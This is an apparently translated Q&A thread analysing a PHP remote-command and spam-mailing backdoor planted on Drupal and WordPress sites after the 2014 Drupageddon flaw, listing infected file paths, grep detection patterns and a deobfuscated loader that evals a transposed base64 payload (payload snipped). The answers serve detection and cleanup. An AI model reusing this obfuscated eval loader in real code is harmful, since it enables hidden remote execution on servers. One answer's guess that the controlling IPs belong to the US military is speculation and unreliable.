Un utente ha segnalato che questo script inviava spam in modo massiccio e intasava Qmail sul server, impedendo l'invio e la ricezione di e-mail legittime da altri siti sul server (quasi 10.000 e-mail in coda) source .

E gli indirizzi IP più offensivi erano:

62.76.191.119
146.185.239.51 (Russia)
37.203.208.9

L'e-mail di spam di esempio assomiglia a:

To: <[email protected]>
Subject: 55th Anniversary and Free Pizza
X-PHP-Originating-Script: 763659:template46.php(236) : eval()'d code
From: Pizza Hut <[email protected]>
X-Mailer: mPOPWeb-Mail2.19
Reply-To: Pizza Hut <[email protected]>
Content-Type: multipart/alternative;
boundary="----------1414414378544E402ACEEBC"
Message-ID: <[email protected]>
Date: Mon, 27 Oct 2014 12:52:58 +0000

Free personal Pan Pizza
Today we are celebrating our 55th anniversary and we want you to share this celebration with us - you may get a free pizza in any of our restaurants.
Get Free Pizza Coupon
The offer is valid through November 5th, 2014.
Copyright (c) 2014 | All right reserved | Pizza Hut

Il metodo della sua azione è anche spiegato da tremore su stackoverflow .

Identificazione e ricerca

Sembra che ci siano molte varianti (come qui , qui ) e mentre indagano su internet i rapporti più frequenti, le vittime più comuni sono Drupal CMS e le istanze di Wordpress.

Ecco la variazione di questi script su Drupal:

sites/all/modules/contrib/ctools/stylizer/plugins/export_ui/template46.php
sites/all/libraries/ckeditor/plugins/specialchar/dialogs/.files74.php
modules/image/tests/stats.php
sites/all/libraries/ckeditor/skins/office2003/images/ajax48.php
sites/all/themes/austin/templates/.javascript.php
sites/all/libraries/ckeditor/plugins/scayt/dialogs/list.php
sites/all/libraries/ckeditor/plugins/scayt/dialogs/.login25.php
sites/default/files/styles/gallerformatter_thumb/public/.sql74.php
sites/all/modules/colorbox/styles/stockholmsyndrome/images/.cache61.php
modules/field/modules/text/.file.php
css/object16.php
sites/all/modules/i18n/i18n_block/stats7.php

e Wordpress :

wp-content/backup-2365b/.title14.php
wp-content/uploads/wysija/themes/rss.lib.php
wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_gallery_display/static/fontawesome/admin38.php

Considerando lo schema di questi file, sembra che siano stati caricati automaticamente da un altro script e il suo nome file è basato sulle frasi IT più comuni seguite dal numero casuale,% estensionephp e punto opzionale (che nasconde il file ).

Come trovare questi file?

Ho usato grep come segue:

grep -R return.*base64_decode  .

o

grep --include=\*.php -rn 'return.*base64_decode($v.\{6\})' .

Se non vi è alcun accesso alla shell, il trasferimento su FTP ( ncftpget -R ) e il controllo locale potrebbero aiutare.

Che cosa è interessato e come ci si arriva

Drupal è il più colpito, a causa della recente vulnerabilità di SQL injection ( SA-CORE-2014-005 ) che consente a un utente malintenzionato di inviare richieste appositamente predisposte con conseguente esecuzione arbitraria di SQL che creerebbe un nuovo file all'interno della gerarchia di cartelle Drupal che in seguito verrebbe utilizzato per tentare di hackerare il sistema. Questo è stato valutato come 25 su 25 come bug altamente critico e tutte le versioni 7.x core di Drupal precedenti alla 7.32 erano interessate. Ecco perché si chiamava Drupageddon. Ulteriori informazioni su: Domande frequenti su SA-CORE-2014-005

Wikipedia afferma:

On October 15, 2014, a sql injection vulnerability was announced and update released. Two weeks later the Drupal security team released an advisory explaining that everyone should act under the assumption that any site not updated within 7 hours of the announcement are infected. Thus, it can be extremely important to apply these updates quickly and usage of a tool to make this process easier like drush is highly recommended.

Ulteriori informazioni

risposta data 15.04.2015 - 22:01
fonte
1

Questa è una shell di comando remota per un server che è stato probabilmente violato, e dovresti considerare il server compromesso. Sarebbe saggio sospendere tutto ciò che ospita, controllare tutto il codice sulla macchina e ricostruirlo / sostituirlo.

Gli utenti remoti che probabilmente controllano questo script possono costringerlo a inviare qualsiasi comando pubblicando "CODE" che è codificato in base64_ (che ha inviato "codice" a eval'd).

Lo script è bloccato in un intervallo di indirizzi IP. Gli indirizzi IP di controllo sembrano essere 6.185.239.* e 8.138.118.* ... che sono posseduti in modo bizzarro dal Dipartimento della Difesa degli Stati Uniti (Comando dei sistemi informativi dell'esercito degli Stati Uniti) e Level3, un fornitore di dorsali (ho controllato solo una manciata di indirizzi IP su queste due gamme, ma finora è abbastanza dannoso.) Questa è la logica che controlla che sia is_good_ip() .

Quindi:

  1. questo è qualcosa inviato e controllato dall'esercito di Fort Huachuca, AZ
  2. i loro server sono compromessi e vengono utilizzati per lavare questa catena di comando
  3. nessuno dei due: qualcuno sta falsamente implicando o accusando il DOD elencando i loro indirizzi IP in una shell e stanno invece utilizzando le macchine Level3 per comunicare.

In ogni caso, nel tuo lungo snippet originale, se sostituisci l'ultimo bit eval(...) e lo sostituisci con echo htmlentities(...) , puoi vedere l'elenco completo del codice. In molti casi sembra che si tratti di e-mail e probabilmente di spidering di contenuti per la generazione di contenuti e-mail.

Fonte: pubblicato da pp19dd all'indirizzo Qualcuno può decodificarlo?

    
risposta data 15.04.2015 - 21:48
fonte
0

Questo file impiega tattiche simili per offuscare il carico utile. I nomi delle variabili e il rientro sono cambiati e le sue azioni diventano molto chiare:

<?php
$char_transposition_map = Array('1'=>'N', '0'=>'S', '3'=>'O', '2'=>'8', '5'=>'v', '4'=>'3', '7'=>'H', '6'=>'n', '9'=>'W', '8'=>'u', 'A'=>'C', 'C'=>'f', 'B'=>'9', 'E'=>'q', 'D'=>'g', 'G'=>'y', 'F'=>'Y', 'I'=>'0', 'H'=>'t', 'K'=>'F', 'J'=>'w', 'M'=>'Q', 'L'=>'b', 'O'=>'2', 'N'=>'d', 'Q'=>'k', 'P'=>'6', 'S'=>'T', 'R'=>'V', 'U'=>'p', 'T'=>'R', 'W'=>'x', 'V'=>'4', 'Y'=>'s', 'X'=>'5', 'Z'=>'X', 'a'=>'A', 'c'=>'G', 'b'=>'e', 'e'=>'j', 'd'=>'1', 'g'=>'L', 'f'=>'U', 'i'=>'B', 'h'=>'r', 'k'=>'c', 'j'=>'a', 'm'=>'P', 'l'=>'7', 'o'=>'h', 'n'=>'D', 'q'=>'m', 'p'=>'I', 's'=>'o', 'r'=>'Z', 'u'=>'i', 't'=>'M', 'w'=>'J', 'v'=>'l', 'y'=>'E', 'x'=>'z', 'z'=>'K');

function transpose_and_base64_decode($source_text, $transposition_map) {
  $transposed_string = '';
  for($i=0; $i < strlen($source_text); $i++) {
    $transposed_string .= isset($transposition_map[$source_text[$i]]) ? $transposition_map[$source_text[$i]] : $source_text[$i];
  }
  return base64_decode($transposed_string);
}

$long_text = '<SNIP>';

eval(transpose_and_base64_decode($long_text, $char_transposition_map));
?>

Fonte: Debianizzazione del malware PHP

    
risposta data 15.04.2015 - 21:30
fonte

Leggi altre domande sui tag